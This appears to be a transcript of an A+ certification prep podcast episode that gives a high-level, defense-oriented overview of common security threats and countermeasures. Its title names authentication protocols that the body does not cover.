Episode 110. Authentication — RADIUS, TACACS+, Kerberos
Digital threats and vulnerabilities represent some of the most persistent risks that technicians must identify and manage. These threats include everything from malware and phishing to internal misuse and system misconfiguration. On the A Plus exam, questions may ask you to identify a particular threat based on symptoms, describe how it spreads, or recommend a response. In real-world environments, recognizing and responding to these issues quickly can prevent serious damage. As a support technician, understanding how digital threats work is the first step toward defending users and systems effectively.
Malware is short for malicious software, and it refers to any program designed to harm, exploit, or compromise a computer system. Malware comes in many forms, and each type has a different purpose or delivery method. Common types include viruses, which attach to other files and spread when opened; worms, which replicate through networks without user action; Trojans, which disguise themselves as legitimate applications; ransomware, which encrypts data for extortion; spyware, which monitors user behavior; and rootkits, which hide malware deep in the system. Symptoms of infection can range from slow performance and pop-ups to stolen credentials and system instability.
Phishing is a form of social engineering that uses deception to trick users into revealing sensitive information. These attacks are most often delivered through email but can also appear as text messages, phone calls, or chat messages. A phishing email may pretend to be from a trusted source, such as a bank or supervisor, and include a link to a fake website. That site may look identical to the real one but is designed to steal usernames, passwords, or other data. Phishing may also be used to convince users to download malware or approve fraudulent financial transfers.
More advanced forms of phishing include spear phishing and whaling. Spear phishing targets specific individuals, often using personal details to increase credibility. For example, an attacker might use the victim’s name, job title, or recent activity to craft a more believable message. Whaling refers to attacks aimed at high-level targets, such as executives, directors, or financial officers. These messages often attempt to bypass normal review processes and prompt urgent action, such as wire transfers or document approvals. Because they are so targeted, these attacks are more dangerous than mass phishing campaigns.
Ransomware is one of the most financially damaging types of malware. Once it enters a system, ransomware encrypts files and displays a ransom demand, usually in cryptocurrency, in exchange for a decryption key. If the ransom is not paid, the data may be permanently lost. Ransomware is often delivered through phishing attachments or by exploiting unpatched vulnerabilities. In large networks, it can spread quickly and shut down business operations within minutes. Regular backups, user education, and prompt patching are critical defenses against this growing threat.
Spyware and keyloggers operate quietly in the background, collecting information without the user’s knowledge. Spyware may gather data on browsing habits, keystrokes, login credentials, or even screenshots. Keyloggers, in particular, record everything typed on the keyboard and send that data to the attacker. These tools are often bundled with free software or embedded in malicious advertising. Because they operate silently and don’t always disrupt system performance, they can be difficult to detect without specialized scanning tools.
Rootkits are one of the most dangerous and difficult types of malware to detect and remove. A rootkit operates at the kernel level of the operating system, giving it deep control and the ability to hide from antivirus programs. Rootkits may modify system processes, intercept commands, or create hidden user accounts. They are often used to maintain long-term access to compromised machines. In many cases, removing a rootkit requires wiping the system and reinstalling the operating system from trusted media, as traditional tools may not be effective.
Fileless malware is a newer category of threat that does not write itself to disk in the traditional way. Instead, it runs entirely in memory and often uses legitimate system tools like PowerShell or W M I to perform its actions. This makes fileless malware very difficult for signature-based antivirus software to detect, because there is no identifiable file to scan. Behavioral detection and endpoint monitoring are required to identify these threats. They may be used in targeted attacks or as part of larger intrusion campaigns.
Insider threats are a serious concern, and they do not always involve malicious intent. An insider threat may be an employee who intentionally steals data, leaks confidential files, or sabotages systems. But more often, insiders become threats through negligence. This could include sending sensitive information to the wrong recipient, reusing weak passwords, or bypassing security protocols. Limiting user permissions, providing regular training, and monitoring user behavior are essential steps in managing insider risk. Some environments also implement data loss prevention tools to restrict file movement or detect anomalies.
For more cyber related content and books, please check out cyber author dot me. Also, there are other prep casts on Cybersecurity and more at Bare Metal Cyber dot com.
Brute-force attacks and credential stuffing are common methods used by attackers to gain unauthorized access to user accounts. A brute-force attack tries every possible password combination until it finds the correct one, while credential stuffing uses stolen usernames and passwords from previous data breaches to log into multiple sites. These attacks are automated and can succeed if users reuse passwords across platforms. Enforcing multi-factor authentication, setting account lockout thresholds, and blocking repeated login attempts from suspicious sources are key ways to prevent these attacks from succeeding.
Software vulnerabilities also pose a significant risk if left unpatched. Vulnerabilities are flaws in the code that can be exploited by attackers to gain control, escalate privileges, or install malware. Some vulnerabilities are known to the vendor and have available fixes, while others are called zero-day vulnerabilities because they are exploited before the vendor becomes aware. Installing updates regularly helps close these security holes. Patch management systems in business environments ensure that all endpoints receive critical updates in a timely and controlled manner.
Misconfigurations are another source of risk that is often overlooked. A misconfigured system may have open ports, default passwords, or excessive permissions that give attackers an easy entry point. Common targets include routers, printers, networked cameras, and other internet of things devices. These systems often come with factory default credentials like admin and password, which must be changed immediately during deployment. Default configurations should always be reviewed, hardened, and documented before a device is connected to a production environment.
Here’s a scenario that demonstrates how ransomware can spread. A user receives an email that appears to contain an invoice and opens the attachment without verifying the sender. The file executes a script that encrypts all local documents and starts spreading to shared network folders. Once the infection is identified, the I T team isolates the system from the network, restores the files from a recent backup, and updates all security software. As a long-term response, the company strengthens its email filtering and launches mandatory phishing awareness training for all staff.
Watering hole attacks take a more indirect approach. Instead of targeting a victim directly, the attacker compromises a website or platform that the target is known to visit regularly. When the victim accesses the site, malware is downloaded or credentials are harvested. These attacks are difficult to detect and can impact multiple users who all trust the same web resource. Web filtering, traffic monitoring, and browser patching are essential defenses. Organizations must also be cautious about which sites are whitelisted or allowed in security policies.
While most threats are digital, physical breaches remain relevant and often complement cyberattacks. Tailgating, for example, allows someone to gain physical access to a secured area by following an authorized user through a locked door. Once inside, an attacker may insert rogue devices, access exposed terminals, or steal data. Combating this requires both physical controls like badge readers and mantraps, as well as user training to prevent social engineering at entry points. The best defense combines physical awareness with technical restrictions.
Honeypots are decoy systems designed to attract attackers and observe their behavior. These systems appear to be legitimate targets, but they are isolated from real production systems. Once an attacker engages with a honeypot, their actions can be monitored, recorded, and analyzed. Honeypots can delay intrusion attempts, mislead adversaries, and provide insight into attack patterns. While honeypots are not a frontline defense for everyday systems, they are a valuable tool for researchers, security analysts, and large enterprises seeking better threat intelligence.
Modern antimalware tools now use behavioral and heuristic analysis in addition to traditional signature-based scanning. Instead of looking for known patterns in files, behavioral detection watches how a program behaves—such as unexpected network activity, suspicious file creation, or attempts to escalate privileges. Heuristic detection uses algorithms to identify previously unknown threats that resemble known attack patterns. These technologies are especially effective against zero-day attacks, polymorphic malware, and fileless exploits that bypass static scanning.
Preventing social engineering requires ongoing effort. Security awareness training helps users recognize phishing, tailgating, baiting, and other manipulation tactics. Organizations should run regular training sessions and simulate attacks to measure user response. For example, sending test phishing emails can help identify users who are most at risk. Training should be paired with clear reporting channels, such as a help desk procedure for suspicious emails, and reinforced with policies that discourage risky behavior.
To summarize, the threat landscape includes both external and internal actors using a wide range of tactics to exploit systems. Malware, phishing, insider risks, brute-force attacks, and misconfigurations all contribute to security incidents. Detection methods like behavioral monitoring, patching, and user education help prevent these issues before they cause damage. This domain is essential for support technicians and is one of the most frequently tested areas on the A Plus certification exam.
